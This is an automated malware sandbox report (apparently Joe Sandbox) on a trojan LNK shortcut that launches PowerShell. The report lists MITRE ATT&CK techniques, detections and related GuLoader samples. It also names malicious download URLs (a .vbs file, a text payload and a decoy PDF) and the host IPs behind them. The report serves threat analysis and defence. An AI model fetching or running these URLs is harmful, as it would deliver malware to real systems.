      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior

      Mitre Att&ck Matrix

      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity Information1
      Scripting      		Valid Accounts11
      Command and Scripting Interpreter      		1
      Scripting      		11
      Process Injection      		11
      Masquerading      		OS Credential Dumping11
      Security Software Discovery      		Remote Services1
      Archive Collected Data      		11
      Encrypted Channel      		Exfiltration Over Other Network MediumAbuse Accessibility Features
      CredentialsDomainsDefault Accounts1
      PowerShell      		1
      Registry Run Keys / Startup Folder      		1
      Registry Run Keys / Startup Folder      		31
      Virtualization/Sandbox Evasion      		LSASS Memory11
      Process Discovery      		Remote Desktop ProtocolData from Removable Media3
      Ingress Tool Transfer      		Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain AccountsAt1
      DLL Side-Loading      		1
      DLL Side-Loading      		11
      Process Injection      		Security Account Manager31
      Virtualization/Sandbox Evasion      		SMB/Windows Admin SharesData from Network Shared Drive3
      Non-Application Layer Protocol      		Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
      Deobfuscate/Decode Files or Information      		NTDS1
      Application Window Discovery      		Distributed Component Object ModelInput Capture14
      Application Layer Protocol      		Traffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
      DLL Side-Loading      		LSA Secrets1
      File and Directory Discovery      		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials21
      System Information Discovery      		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet
      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1578187 Sample: 0bNBLjPn56.lnk Startdate: 19/12/2024 Architecture: WINDOWS Score: 100 25 www.astenterprises.com.pk 2->25 27 www.al-rasikh.com 2->27 29 5 other IPs or domains 2->29 37 Antivirus / Scanner detection for submitted sample 2->37 39 Windows shortcut file (LNK) starts blacklisted processes 2->39 41 Multi AV Scanner detection for submitted file 2->41 43 8 other signatures 2->43 9 powershell.exe 17 24 2->9         started        13 svchost.exe 1 1 2->13         started        signatures3 process4 dnsIp5 31 al-rasikh.com 107.161.23.150, 443, 49721, 49738 RAMNODEUS United States 9->31 33 www.bluemaxxlaser.com 203.175.174.69, 49754, 80 SGGS-AS-APSGGSSG Singapore 9->33 45 Windows shortcut file (LNK) starts blacklisted processes 9->45 47 Powershell creates an autostart link 9->47 15 Acrobat.exe 20 74 9->15         started        17 powershell.exe 7 9->17         started        19 conhost.exe 1 9->19         started        35 127.0.0.1 unknown unknown 13->35 signatures6 process7 process8 21 AcroCEF.exe 106 15->21         started        process9 23 AcroCEF.exe 4 21->23         started       

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      0bNBLjPn56.lnk25%VirustotalBrowse
      0bNBLjPn56.lnk29%ReversingLabsShortcut.Trojan.FakeupdateLNK
      0bNBLjPn56.lnk100%AviraLNK/Dldr.Agent.VPUF
      0bNBLjPn56.lnk100%Joe Sandbox ML

      Dropped Files

      No Antivirus matches

      Unpacked PE Files

      No Antivirus matches

      Domains

      No Antivirus matches

      URLs

      SourceDetectionScannerLabelLink
      https://www.astenterprises.com.pk/ms/List%20of%20required%20items%20and%20services.pdf80%Avira URL Cloudsafe
      http://www.bluemaxxlaser.com/ms/ms.vbs0%Avira URL Cloudsafe
      https://www.al-rasikh.com/ms/neaters.txtP0%Avira URL Cloudsafe
      http://www.al-rasikh.com0%Avira URL Cloudsafe
      http://al-rasikh.com0%Avira URL Cloudsafe
      https://www.astenterprises.com.pk/ms/List%20of%20required%20items%20and%20services.pdf0%Avira URL Cloudsafe
      https://www.al-rasikh.com0%Avira URL Cloudsafe
      https://www.al-rasikh.com/ms/neaters.txt-UseBasicParsing0%Avira URL Cloudsafe
      http://www.blujlqmaxxlasjlqr.com/ms/ms.vbs0%Avira URL Cloudsafe
      https://www.astjlqntjlqrprisjlqs.com.pk/ms/List%20of%20rjlqquirjlqd%20itjlqms%20and%20sjlqrvicjlqs.p0%Avira URL Cloudsafe
      http://www.astenterprises.com.pk0%Avira URL Cloudsafe
      https://www.astenterprises.com.pk0%Avira URL Cloudsafe
      http://www.blujlqmaxxlasjlqr.com/ms/ms.vbsX0%Avira URL Cloudsafe
      http://astenterprises.com.pk0%Avira URL Cloudsafe
      https://www.al-rasikh.com/ms/nea0%Avira URL Cloudsafe
      http://www.bluemaxxlaser.com0%Avira URL Cloudsafe
      https://www.al-rasikh.com/ms/neaters.txt0%Avira URL Cloudsafe
      https://www.al-rasikh.com/ms/neaters.txt4p0%Avira URL Cloudsafe
      http://www.blujlqmaxxlasjlqr.com/ms/ms.0%Avira URL Cloudsafe

      Domains and IPs

      Contacted Domains

      NameIPActiveMaliciousAntivirus DetectionReputation
      bg.microsoft.map.fastly.net
      		199.232.210.172
      		truefalse
        		high
        astenterprises.com.pk
        		107.161.23.150
        		truefalse
          		unknown
          www.bluemaxxlaser.com
          		203.175.174.69
          		truefalse
            		unknown
            al-rasikh.com
            		107.161.23.150
            		truetrue
              		unknown
              x1.i.lencr.org
              		unknown
              		unknownfalse
                		high
                www.al-rasikh.com
                		unknown
                		unknowntrue
                  		unknown
                  www.astenterprises.com.pk
                  		unknown
                  		unknowntrue
                    		unknown

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    http://www.bluemaxxlaser.com/ms/ms.vbsfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://www.astenterprises.com.pk/ms/List%20of%20required%20items%20and%20services.pdffalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://www.al-rasikh.com/ms/neaters.txttrue
                    • Avira URL Cloud: safe
                    		unknown

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    http://nuget.org/NuGet.exepowershell.exe, 00000002.00000002.2442876818.0000026B2DB48000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2442876818.0000026B2DA05000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high
                      http://x1.i.lencr.org/2D85F72862B55C4EADD9E66E06947F3D0.10.drfalse
                        		high
                        https://www.astenterprises.com.pk/ms/List%20of%20required%20items%20and%20services.pdf8powershell.exe, 00000002.00000002.2389019510.0000026B1F713000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000002.00000002.2389019510.0000026B1DBC2000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000002.00000002.2389019510.0000026B1DBC2000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            https://go.micropowershell.exe, 00000002.00000002.2389019510.0000026B1E75F000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              http://www.al-rasikh.compowershell.exe, 00000002.00000002.2389019510.0000026B1F041000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://contoso.com/Licensepowershell.exe, 00000002.00000002.2442876818.0000026B2DA05000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                https://www.al-rasikh.com/ms/neaters.txt-UseBasicParsingpowershell.exe, 00000002.00000002.2451470735.0000026B35DEC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2386989031.0000026B1BC60000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2353829592.0000026B1BADE000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2387303760.0000026B1BCD5000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2449512152.0000026B35B4E000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2353829592.0000026B1BA87000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2451470735.0000026B35E75000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://contoso.com/Iconpowershell.exe, 00000002.00000002.2442876818.0000026B2DA05000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  http://al-rasikh.compowershell.exe, 00000002.00000002.2389019510.0000026B1F041000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://g.live.com/odclientsettings/ProdV21C:svchost.exe, 0000000B.00000003.2347057711.000001EA0D2C0000.00000004.00000800.00020000.00000000.sdmp, edb.log.11.drfalse
                                    		high
                                    https://www.al-rasikh.com/ms/neaters.txtPpowershell.exe, 00000002.00000002.2389019510.0000026B1E75F000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://crl.ver)svchost.exe, 0000000B.00000002.3460852336.000001EA0D400000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		high
                                      http://www.blujlqmaxxlasjlqr.com/ms/ms.vbspowershell.exe, 00000002.00000002.2389019510.0000026B1F074000.00000004.00000800.00020000.00000000.sdmptrue
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://www.astjlqntjlqrprisjlqs.com.pk/ms/List%20of%20rjlqquirjlqd%20itjlqms%20and%20sjlqrvicjlqs.ppowershell.exe, 00000002.00000002.2389019510.0000026B1F713000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://www.al-rasikh.compowershell.exe, 00000002.00000002.2389019510.0000026B1E75F000.00000004.00000800.00020000.00000000.sdmptrue
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://github.com/Pester/Pesterpowershell.exe, 00000002.00000002.2389019510.0000026B1DBC2000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        http://www.astenterprises.com.pkpowershell.exe, 00000002.00000002.2389019510.0000026B1F902000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://astenterprises.com.pkpowershell.exe, 00000002.00000002.2389019510.0000026B1F902000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://g.live.com/odclientsettings/Prod1C:qmgr.db.11.drfalse
                                          		high
                                          https://www.astenterprises.com.pkpowershell.exe, 00000002.00000002.2389019510.0000026B1F713000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.blujlqmaxxlasjlqr.com/ms/ms.vbsXpowershell.exe, 00000002.00000002.2389019510.0000026B1F0C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.bluemaxxlaser.compowershell.exe, 00000002.00000002.2389019510.0000026B1F978000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://contoso.com/powershell.exe, 00000002.00000002.2442876818.0000026B2DA05000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            https://nuget.org/nuget.exepowershell.exe, 00000002.00000002.2442876818.0000026B2DB48000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2442876818.0000026B2DA05000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              https://www.al-rasikh.com/ms/neapowershell.exe, 00000002.00000002.2389019510.0000026B1DBC2000.00000004.00000800.00020000.00000000.sdmptrue
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.blujlqmaxxlasjlqr.com/ms/ms.powershell.exe, 00000002.00000002.2389019510.0000026B1F0C2000.00000004.00000800.00020000.00000000.sdmptrue
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://www.al-rasikh.com/ms/neaters.txt4ppowershell.exe, 00000002.00000002.2353829592.0000026B1BA87000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://aka.ms/pscore68powershell.exe, 00000002.00000002.2389019510.0000026B1D991000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2266815874.0000027DD5E7B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2266815874.0000027DD5E8E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000002.00000002.2389019510.0000026B1D991000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2266815874.0000027DD5EB5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high

                                                  World Map of Contacted IPs

                                                  • No. of IPs < 25%
                                                  • 25% < No. of IPs < 50%
                                                  • 50% < No. of IPs < 75%
                                                  • 75% < No. of IPs

                                                  Public IPs

                                                  IPDomainCountryFlagASNASN NameMalicious
                                                  203.175.174.69
                                                  		www.bluemaxxlaser.comSingapore
                                                  		24482SGGS-AS-APSGGSSGfalse
                                                  107.161.23.150
                                                  		astenterprises.com.pkUnited States
                                                  		3842RAMNODEUStrue

                                                  Private

                                                  IP
                                                  127.0.0.1

                                                  General Information

                                                  Joe Sandbox version:41.0.0 Charoite
                                                  Analysis ID:1578187
                                                  Start date and time:2024-12-19 11:55:09 +01:00
                                                  Joe Sandbox product:CloudBasic
                                                  Overall analysis duration:0h 5m 23s
                                                  Hypervisor based Inspection enabled:false
                                                  Report type:full
                                                  Cookbook file name:default.jbs
                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                  Number of analysed new started processes analysed:22
                                                  Number of new started drivers analysed:0
                                                  Number of existing processes analysed:0
                                                  Number of existing drivers analysed:0
                                                  Number of injected processes analysed:0
                                                  Technologies:
                                                  • HCA enabled
                                                  • EGA enabled
                                                  • AMSI enabled
                                                  Analysis Mode:default
                                                  Analysis stop reason:Timeout
                                                  Sample name:0bNBLjPn56.lnk
                                                  renamed because original name is a hash value
                                                  Original Sample Name:18606c684a9f169298350be1dc11f222d27c68789953f78d0feedfea90d07c53.lnk
                                                  Detection:MAL
                                                  Classification:mal100.evad.winLNK@20/58@5/3
                                                  EGA Information:Failed
                                                  HCA Information:
                                                  • Successful, ratio: 100%
                                                  • Number of executed functions: 10
                                                  • Number of non-executed functions: 9
                                                  Cookbook Comments:
                                                  • Found application associated with file extension: .lnk

                                                  Warnings

                                                  • Exclude process from analysis (whitelisted): dllhost.exe, BackgroundTransferHost.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe
                                                  • Excluded IPs from analysis (whitelisted): 23.218.208.137, 162.159.61.3, 172.64.41.3, 34.237.241.83, 54.224.241.105, 50.16.47.176, 18.213.11.84, 23.218.208.109, 23.195.61.56, 2.19.198.27, 2.19.198.16, 23.32.239.65, 23.32.239.56, 23.32.239.9, 20.234.120.54, 23.32.239.34, 2.19.198.32, 20.231.128.67, 20.223.36.55, 13.107.246.63, 150.171.27.10, 52.149.20.212, 23.47.168.24, 20.74.47.205
                                                  • Excluded domains from analysis (whitelisted): e4578.dscg.akamaiedge.net, chrome.cloudflare-dns.com, e8652.dscx.akamaiedge.net, slscr.update.microsoft.com, asf-ris-prod-neu-azsc.northeurope.cloudapp.azure.com, tse1.mm.bing.net, g.bing.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, acroipm2.adobe.com, ocsp.digicert.com, ssl-delivery.adobe.com.edgekey.net, login.live.com, e16604.g.akamaiedge.net, a122.dscd.akamai.net, prod.fs.microsoft.com.akadns.net, wu-b-net.trafficmanager.net, crl.root-x1.letsencrypt.org.edgekey.net, client.wns.windows.com, fs.microsoft.com, otelrules.azureedge.net, acroipm2.adobe.com.edgesuite.net, ctldl.windowsupdate.com.delivery.microsoft.com, ris-prod.trafficmanager.net, ctldl.windowsupdate.com, p13n.adobe.io, fe3cr.delivery.mp.microsoft.com, ris.api.iris.microsoft.com, armmf.adobe.com, geo2.adobe.com
                                                  • Execution Graph export aborted for target powershell.exe, PID 2744 because it is empty
                                                  • Execution Graph export aborted for target powershell.exe, PID 7552 because it is empty
                                                  • Not all processes where analyzed, report is missing behavior information
                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                  Simulations

                                                  Behavior and APIs

                                                  TimeTypeDescription
                                                  05:56:09API Interceptor39x Sleep call for process: powershell.exe modified
                                                  05:56:22API Interceptor2x Sleep call for process: svchost.exe modified
                                                  05:56:32API Interceptor1x Sleep call for process: AcroCEF.exe modified

                                                  Joe Sandbox View / Context

                                                  IPs

                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                  203.175.174.6964Tgzu2FKh.exeGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                  • bluemaxxlaser.com/rh/rheu.bin
                                                  zp.exeGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                  • bluemaxxlaser.com/rh/rh.bin
                                                  eua.ps1Get hashmaliciousGuLoaderBrowse
                                                  • www.bluemaxxlaser.com/rh/List%20of%20required%20items%20and%20services.pdf
                                                  zp.ps1Get hashmaliciousUnknownBrowse
                                                  • www.bluemaxxlaser.com/rh/List%20of%20required%20items%20and%20services.pdf
                                                  zk.ps1Get hashmaliciousUnknownBrowse
                                                  • www.bluemaxxlaser.com/rh/List%20of%20required%20items%20and%20services.pdf
                                                  mx.ps1Get hashmaliciousUnknownBrowse
                                                  • www.bluemaxxlaser.com/rh/List%20of%20required%20items%20and%20services.pdf
                                                  zpeu.exeGet hashmaliciousGuLoaderBrowse
                                                  • bluemaxxlaser.com/rh/rheu.bin
                                                  as.ps1Get hashmaliciousGuLoaderBrowse
                                                  • www.bluemaxxlaser.com/rh/List%20of%20required%20items%20and%20services.pdf
                                                  107.161.23.150List of required items and services.pdf.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                    List of required items pdf.vbsGet hashmaliciousGuLoaderBrowse
                                                      List of required items and services pdf.vbsGet hashmaliciousGuLoaderBrowse
                                                        List of required items pdf.vbsGet hashmaliciousGuLoaderBrowse
                                                          List of required items and services pdf.vbsGet hashmaliciousGuLoaderBrowse
                                                            xw0K5Lahxz.exeGet hashmaliciousUnknownBrowse

                                                              Domains

                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                              www.bluemaxxlaser.comeua.ps1Get hashmaliciousGuLoaderBrowse
                                                              • 203.175.174.69
                                                              zp.ps1Get hashmaliciousUnknownBrowse
                                                              • 203.175.174.69
                                                              zk.ps1Get hashmaliciousUnknownBrowse
                                                              • 203.175.174.69
                                                              mx.ps1Get hashmaliciousUnknownBrowse
                                                              • 203.175.174.69
                                                              as.ps1Get hashmaliciousGuLoaderBrowse
                                                              • 203.175.174.69
                                                              bg.microsoft.map.fastly.netDix7g8PK1e.pdfGet hashmaliciousUnknownBrowse
                                                              • 199.232.210.172
                                                              CROC000400 .pdfGet hashmaliciousUnknownBrowse
                                                              • 199.232.210.172
                                                              contract_signed.pdfGet hashmaliciousUnknownBrowse
                                                              • 199.232.214.172
                                                              T.T_Copy.12.18.2024.exeGet hashmaliciousArrowRATBrowse
                                                              • 199.232.214.172
                                                              22054200882739718047.jsGet hashmaliciousStrela DownloaderBrowse
                                                              • 199.232.214.172
                                                              Sh2uIqqKqc.exeGet hashmaliciousCryptbotBrowse
                                                              • 199.232.214.172
                                                              alyemenione.lnkGet hashmaliciousHavoc, QuasarBrowse
                                                              • 199.232.214.172
                                                              R8CAg00Db8.lnkGet hashmaliciousUnknownBrowse
                                                              • 199.232.214.172
                                                              A file has been sent to you via DROPBOX.pdfGet hashmaliciousUnknownBrowse
                                                              • 199.232.210.172
                                                              PyIsvSahWy.exeGet hashmaliciousUnknownBrowse
                                                              • 199.232.210.172

                                                              ASNs

                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                              RAMNODEUSList of required items and services.pdf.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                              • 107.161.23.150
                                                              List of required items pdf.vbsGet hashmaliciousGuLoaderBrowse
                                                              • 107.161.23.150
                                                              List of required items and services pdf.vbsGet hashmaliciousGuLoaderBrowse
                                                              • 107.161.23.150
                                                              List of required items pdf.vbsGet hashmaliciousGuLoaderBrowse
                                                              • 107.161.23.150
                                                              List of required items and services pdf.vbsGet hashmaliciousGuLoaderBrowse
                                                              • 107.161.23.150
                                                              owari.x86.elfGet hashmaliciousUnknownBrowse
                                                              • 168.235.88.56
                                                              owari.ppc.elfGet hashmaliciousUnknownBrowse
                                                              • 168.235.65.115
                                                              i486.elfGet hashmaliciousMiraiBrowse
                                                              • 168.235.88.39
                                                              na.elfGet hashmaliciousUnknownBrowse
                                                              • 107.161.24.95
                                                              na.elfGet hashmaliciousUnknownBrowse
                                                              • 107.161.24.95
                                                              SGGS-AS-APSGGSSGteste.x86.elfGet hashmaliciousMirai, Moobot, OkiruBrowse
                                                              • 103.14.247.60
                                                              na.elfGet hashmaliciousGafgytBrowse
                                                              • 103.14.247.29
                                                              na.elfGet hashmaliciousGafgytBrowse
                                                              • 103.14.247.60
                                                              jZ6ejWIrSV.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                              • 103.14.247.64
                                                              IGvLaRmr0J.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                              • 103.14.247.58
                                                              wget.elfGet hashmaliciousGafgytBrowse
                                                              • 103.14.247.62
                                                              4v7myD9mN2OaWZp.exeGet hashmaliciousAgentTeslaBrowse
                                                              • 203.175.171.5
                                                              rNNA.exeGet hashmaliciousAgentTeslaBrowse
                                                              • 203.175.171.5
                                                              wg2vKIF0SU.elfGet hashmaliciousGafgytBrowse
                                                              • 103.14.247.45
                                                              LF6B2XTwcV.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                              • 103.14.247.32

                                                              JA3 Fingerprints

                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                              3b5074b1b5d032e5620f69f9f700ff0et5lpvahkgypd7wy.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                              • 107.161.23.150
                                                              RFQ Letter and Instructions.pdfGet hashmaliciousUnknownBrowse
                                                              • 107.161.23.150
                                                              File di reclamo per violazione del copyright File di reclamo per violazione del copyright.lnk.d.lnkGet hashmaliciousUnknownBrowse
                                                              • 107.161.23.150
                                                              File di reclamo per violazione del copyright File di reclamo per violazione del copyright.lnk.d.lnkGet hashmaliciousUnknownBrowse
                                                              • 107.161.23.150
                                                              DHL_231437894819.bat.exeGet hashmaliciousAgentTeslaBrowse
                                                              • 107.161.23.150
                                                              4089137200.exeGet hashmaliciousAgentTeslaBrowse
                                                              • 107.161.23.150
                                                              file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, PureLog Stealer, Stealc, VidarBrowse
                                                              • 107.161.23.150
                                                              Dix7g8PK1e.pdfGet hashmaliciousUnknownBrowse
                                                              • 107.161.23.150
                                                              Corporate_Code_of_Ethics_and_Business_Conduct_Policy_2024.pdf.lnk.d.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                              • 107.161.23.150
                                                              main1.batGet hashmaliciousAbobus ObfuscatorBrowse
                                                              • 107.161.23.150

                                                              Dropped Files

                                                              No context

                                                              Created / dropped Files

                                                              C:\ProgramData\Microsoft\Network\Downloader\edb.log

                                                              Download File
                                                              Process:C:\Windows\System32\svchost.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):1310720
                                                              Entropy (8bit):0.7263338755130785
                                                              Encrypted:false
                                                              SSDEEP:1536:9J8s6YR3pnhWKInznxTgScwXhCeEcrKYSZNmTHk4UQJ32aqGT46yAwFM5hA7yH0T:9JZj5MiKNnNhoxum
                                                              MD5:1DF35FB4E56EF8B9ED983BB72F38ECB1
                                                              SHA1:C5E779988CC0B76609F52CF3E79D5BDEC497A319
                                                              SHA-256:6DD28495B922F7CB6CF306C780960D3E1E33E8E404280488943387B6BA45B976
                                                              SHA-512:79030411D34490873C7A40D1B284335AE62AF87EBB50F17FF469D9951229802AEF51DD754A8D53CA5F68FD2CA3F1E53095BD2F55650D349C091F2BE163BD6F4B
                                                              Malicious:false
                                                              Reputation:low
